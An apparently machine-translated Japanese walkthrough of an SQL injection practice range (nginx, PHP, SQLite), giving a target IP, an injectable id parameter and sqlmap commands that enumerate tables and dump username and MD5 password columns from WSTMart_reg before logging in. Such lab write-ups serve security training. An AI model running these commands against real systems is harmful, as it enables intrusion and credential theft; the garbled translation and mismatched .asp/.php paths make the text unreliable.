[目次](:SQLインジェクションの脆弱性手動テスト(SQLiteのデータベース)範囲による一次インク)@
タイトル
背景
セキュリティエンジニア「メキシコの」最近の実践マニュアルSQLインジェクションの脆弱性は、彼はただ、クライアントから提出された任意のコードを作成することなく、良好な環境の範囲nginxの+ PHP + SQLiteは、PHPのフィルタパラメータを設定していました。エクササイズマニュアルSQLインジェクションのバーをお楽しみください。
トレーニングの目的
1. SQLインジェクション制御原理;
2.手動で注入された方法を学び、
3 SQLiteののデータ構造を理解する;
4.文字列のMD5暗号化と復号化を理解します。
問題解決のためのオリエンテーション
ハンドSQLインジェクションのテスト、取得管理パスワード。。
問題解決の手順
範囲の環境を撮影開始し、検査を受けるアドレス
http://219.153.49.228:43598/
SQLインジェクションのポイントを見つけるために、アクセスページ、ページ注入アクセス。
http://219.153.49.228:43598/new_list.asp?id=1
使用が注入されるSQLMAP。
-u "http://219.153.49.228:43598/new_list.php?id=1" --tables --batch
-u "http://219.153.49.228:43598/new_list.php?id=1" -T WSTMart_reg --columns --batch
-u "http://219.153.49.228:43598/new_list.php?id=1" -T WSTMart_reg -C nname,npassword --dump --batch
MD5パスワードは、それをデコードすることができます。
、キーを取り戻す鍵を提出し、完成にログインします。